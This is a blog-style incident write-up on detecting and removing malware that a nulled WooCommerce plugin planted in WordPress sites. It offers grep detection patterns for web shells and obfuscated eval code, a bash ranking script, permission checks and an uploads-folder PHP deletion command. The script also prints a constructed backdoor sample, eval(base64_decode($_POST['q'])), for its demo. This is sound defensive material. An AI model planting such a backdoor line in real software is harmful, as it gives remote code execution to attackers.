While searching the internet I found a site which provides premium plugins and themes for free. Out of excitement I downloaded a WooCommerce premium plugin and uploaded it directly to our live server through Git. Unfortunately, it was a big mistake: that plugin contained an exploit script.
Nature of the Exploit Script:
I am using EasyEngine.io on a DigitalOcean server, hosting more than 12 domains. In the root folder of every website some random files and folders had been created, and some js files had a script injected into them. Initially, I couldn't find the files which contained this type of script.
Commands I used to look for the exploit code in the WordPress files. The first one-liner combines several common indicators in one extended regex (eval() fed by base64_decode/gzinflate or request data, variable names made of only 0 and O, the FilesMan web shell, base64 fragments of "auth_", die(PHP_OS) fingerprinting, and document.write of \u00-escaped JS) and lists only the file names:
grep '((eval.*(base64_decode|gzinflate|\$_))|\$[0O]{4,}|FilesMan|GLOBALS.*exit|JGF1dGhfc|IIIl|die\(PHP_OS|posix_getpwuid|Array\(base64_decode|document\.write\("\\u00|sh(3(ll|11)))' . -lroE --include='*.php*'
grep -Rn "shell_exec *(" /var/www
grep -Rn "base64_decode *(" /var/www
grep -Rn "phpinfo *(" /var/www
grep -Rn "system *(" /var/www
grep -Rn "php_uname *(" /var/www
grep -Rn "chmod *(" /var/www
grep -Rn "fopen *(" /var/www
grep -Rn "fclose *(" /var/www
grep -Rn "readfile *(" /var/www
grep -Rn "edoced_46esab *(" /var/www
grep -Rn "eval *(" /var/www
grep -Rn "passthru *(" /var/www
Some of these functions (fopen, fclose, readfile, chmod, base64_decode) are used by WordPress core and by well-known plugins, so those searches return many legitimate hits; compare the flagged paths against a clean copy of the same versions instead of deleting on sight. "edoced_46esab" is base64_decode spelled backwards: malware calls it through strrev() so that a plain search for base64_decode finds nothing.
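As an added example (this is not code from the original post): instead of reading the raw grep -Rn output for each function separately, the script below combines the useful indicators into one pattern and ranks files by how many lines hit, so a dropper floats to the top while a core file that merely calls fopen() does not appear at all. It assumes bash and GNU grep; the sample tree it builds (a fake nulled-plugin backdoor, a clean core-style file, a harmless JS file) is constructed for the demo.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post. Assumes bash and GNU grep
# (-r, --include). The sample tree built below is constructed for the demo.

# One extended regex of indicators. fopen/fclose/readfile are left out on
# purpose: WordPress core uses them in hundreds of places, so they only add noise.
# Alternatives: dangerous function called (not as part of a longer name),
# strrev()-obfuscated base64_decode, the FilesMan web shell, a request
# parameter used as a function name, and \u00-escaped document.write() in JS.
INDICATORS='(^|[^A-Za-z0-9_])(eval|assert|system|passthru|shell_exec|base64_decode|gzinflate|gzuncompress|str_rot13) *\('\
'|edoced_46esab|FilesMan|\$_(POST|GET|REQUEST|COOKIE)\[[^]]+\] *\('\
'|document\.write\("\\u00'

# Prints "<hit-lines> <path>" for every PHP/JS file with at least one hit,
# highest count first. Read the top of the list first: droppers usually score
# several hits in a file that has no business calling eval at all.
scan_indicators() {
  grep -rEIc --include='*.php*' --include='*.phtml' --include='*.js' \
       -e "$INDICATORS" -- "$1" |
  awk -F: '$NF > 0 { n = $NF; sub(/:[0-9]+$/, ""); print n, $0 }' |
  sort -rn
}

# Constructed sample: a backdoor hidden in a "premium" plugin, a clean file that
# uses the functions the post's grep commands flag, and a harmless JS file.
make_sample_tree() {
  local root; root="$(mktemp -d)"
  mkdir -p "$root/wp-content/plugins/shop-pro" "$root/wp-includes" \
           "$root/wp-content/themes/x/js"
  cat > "$root/wp-content/plugins/shop-pro/class.cache.php" <<'EOF'
<?php
// looks like a cache helper, is a remote code execution backdoor (constructed)
if (isset($_POST['q'])) {
    @eval(base64_decode($_POST['q']));
}
$f = 'edoced_46esab'; // strrev() obfuscation of base64_decode
EOF
  cat > "$root/wp-includes/file.php" <<'EOF'
<?php
// legitimate file I/O: the grep for fopen/fclose/readfile flags this file too
$fh = fopen('debug.log', 'a');
fclose($fh);
readfile('readme.html');
EOF
  printf 'document.getElementById("cart").textContent = "0";\n' \
      > "$root/wp-content/themes/x/js/cart.js"
  echo "$root"
}

# Stand-alone demo: build the sample tree, rank it, clean up.
root="$(make_sample_tree)"
scan_indicators "$root"
rm -rf "$root"
```

On a real site run scan_indicators against the docroot (for example /var/www/example.com/htdocs) and work down from the top of the list. Hits inside wp-includes or wp-admin should then be checked against a clean copy of the same WordPress version; with WP-CLI installed, wp core verify-checksums does exactly that against the official checksums.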
Check File Permissions:
A 777 permission (readable, writable and executable by everyone) on a file or folder is dangerous, because any process on the server can modify it. Find such files and folders with the following command (note that it only matches the exact mode 0777, so a file with, for example, 666 is not listed):
find /var/www -type f -perm 0777
The right permissions for WordPress files are 644 and for folders 755. Check the detailed post regarding file permissions here.
Check Upload Directory:
In some cases the malicious code is placed in the WordPress uploads directory, which should only ever contain media files, never PHP. So check for any PHP files in this folder: go to your WordPress root directory and run
find . -path "*wp-content/uploads*" -name "*.php"
and, after reviewing the list (this search is case-sensitive and does not catch .phtml or .php5 files, which the server may still execute), delete them:
find . -path "*wp-content/uploads*" -name "*.php" -delete